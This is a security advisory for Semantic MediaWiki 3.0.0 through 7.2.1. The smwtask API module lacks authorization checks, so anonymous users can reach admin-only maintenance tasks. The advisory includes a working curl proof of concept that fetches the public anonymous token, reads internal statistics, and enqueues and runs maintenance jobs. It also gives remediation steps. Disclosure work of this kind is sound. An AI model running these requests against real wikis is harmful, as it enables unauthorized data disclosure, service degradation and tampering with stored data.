---
id: GHSA-jr78-w6w5-m8f8
title: >-
  Semantic MediaWiki'a missing authorization in the smwtask API module allows
  unauthenticated access to admin-only maintenance tasks
summary: >-
  Semantic MediaWiki'a missing authorization in the smwtask API module allows
  unauthenticated access to admin-only maintenance tasks
severity: high
cvss: 7.3
cwe:
  - CWE-862
vendor: mediawiki
product: mediawiki/semantic-media-wiki
ecosystem: composer
affected:
  - 'mediawiki/semantic-media-wiki >= 3.0.0, <= 7.2.1'
patched:
  - mediawiki/semantic-media-wiki 7.3.0
published: '2026-09-18'
updated: '2026-09-18'
sourceUpdated: '2026-09-18T16:59:32Z'
source: GHSA
sourceUrl: 'https://github.com/advisories/GHSA-jr78-w6w5-m8f8'
references:
  - url: >-
      https://github.com/SemanticMediaWiki/SemanticMediaWiki/security/advisories/GHSA-jr78-w6w5-m8f8
  - url: 'https://github.com/SemanticMediaWiki/SemanticMediaWiki/releases/tag/7.3.0'
  - url: 'https://github.com/advisories/GHSA-jr78-w6w5-m8f8'
tags:
  - ghsa
  - composer
ingestedAt: '2026-09-18T17:46:41.532Z'
---

## Overview

### Summary

The `api.php?action=smwtask` API module performs no authorization check. The equivalent maintenance interface in the web UI (`Special:SMWAdmin`) requires the `smw-admin` right, but the API module that backs several of the same operations enforces nothing. An unauthenticated visitor can therefore retrieve internal Semantic MediaWiki database statistics and reach state-changing maintenance operations that are intended to be administrator-only.

### Details

`SMW\MediaWiki\Api\Task::execute()` (`src/MediaWiki/Api/Task.php`) reads the request parameters, resolves a task through `TaskFactory`, and runs it. It contains no permission check — no `smw-admin`, no `checkUserRightsAny()`, no per-task right.

The only gates on the module are:

- `needsToken( 'csrf' )` — this is **not** authorization. MediaWiki issues anonymous users a fixed, public CSRF token (`+\`), so any unauthenticated caller satisfies the token check. It defends logged-in users against CSRF; it does nothing against a direct anonymous request.
- `mustBePosted()` / `isWriteMode()` — do not gate on group membership.

By contrast, `Special:SMWAdmin` restricts access via `parent::__construct( 'SMWAdmin', 'smw-admin' )` and raises `PermissionsError` when the `smw-admin` right is absent. The API path bypasses that restriction entirely.

Tasks reachable anonymously through the module include:

- `table-statistics`, `duplicate-lookup` — return internal store statistics and enumerate the internal object-ID space (intended to be behind `Special:SMWAdmin` → Supplementary functions).
- `insert-job` — enqueues any Semantic MediaWiki job type (including `smw.fulltextSearchTableRebuild`, `smw.propertyStatisticsRebuild`, `smw.entityIdDisposer`) for an arbitrary title.
- `update`, `check-query`, `run-joblist` — run update jobs and `#ask` queries synchronously within the request; `run-joblist` pops and executes queued jobs inline.

Because the read tasks disclose the internal object-ID space and `insert-job` can enqueue `smw.entityIdDisposer` with a specific `id` parameter, the exposure extends beyond information disclosure and resource consumption to targeted modification of stored semantic data.

### Proof of concept

On a default installation, as an unauthenticated visitor:

```
# 1. Obtain the anonymous CSRF token (the fixed public value "+\")
curl -s 'https://HOST/api.php?action=query&meta=tokens&type=csrf&format=json'
#   -> {"query":{"tokens":{"csrftoken":"+\\"}}}

# 2. Read internal database statistics — HTTP 200 with the data
curl -s -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-raw 'action=smwtask&task=table-statistics&params={}&token=%2B%5C&format=json' \
  'https://HOST/api.php'
#   -> {"task":{"list":{"smw_object_ids":{"total_row_count":49,"last_id":516,...

# 3. Enqueue a maintenance job (state-changing)
curl -s --data-urlencode 'action=smwtask' --data-urlencode 'task=insert-job' \
  --data-urlencode 'params={"subject":"Main_Page#0##","job":"smw.fulltextSearchTableRebuild","parameters":{"mode":"full"}}' \
  --data-urlencode 'token=+\' --data-urlencode 'format=json' 'https://HOST/api.php'
#   -> {"task":{"done":""}}   (job now present in the queue)

# 4. Execute queued jobs synchronously in the anonymous request
curl -s --data-urlencode 'action=smwtask' --data-urlencode 'task=run-joblist' \
  --data-urlencode 'params={"subject":"Main_Page#0##","jobs":{"smw.fulltextSearchTableRebuild":1}}' \
  --data-urlencode 'token=+\' --data-urlencode 'format=json' 'https://HOST/api.php'
#   -> {"task":{"done":"","log":{"smw.fulltextSearchTableRebuild":["Main_Page"]}}}
```

Reproduced on `master` against a default install, with the requester confirmed anonymous (`action=query&meta=userinfo` returned `{"id":0,"anon":""}`).

### Impact

An unauthenticated attacker can:

- Retrieve internal Semantic MediaWiki database statistics — row counts, the last/highest internal object ID, per-namespace breakdowns, and blob term statistics — and enumerate the internal object-ID space.
- Enqueue arbitrary Semantic MediaWiki maintenance jobs and force synchronous execution of update jobs, `#ask` queries, and queued jobs, degrading wiki performance.
- Reach entity-disposal operations against enumerated object IDs, affecting the integrity of stored semantic data.

Practical severity depends on deployment: the disclosed statistics are more sensitive on a populated wiki, and the performance and integrity impact scales with store size and job cost.

### Affected versions

All releases that ship the `smwtask` API module (introduced in 3.x) up to and including the current release.

### Mitigation

Upgrading to 7.3.0+ or apply a local patch in `localSettings.php` to disable the endpoint if you can't update:
```php
$wgExtensionFunctions[] = static function () {
      unset( $GLOBALS['wgAPIModules']['smwtask'] );
};
```

## Affected packages

- `mediawiki/semantic-media-wiki >= 3.0.0, <= 7.2.1`

## Remediation

Upgrade to a patched release:

- `mediawiki/semantic-media-wiki 7.3.0`
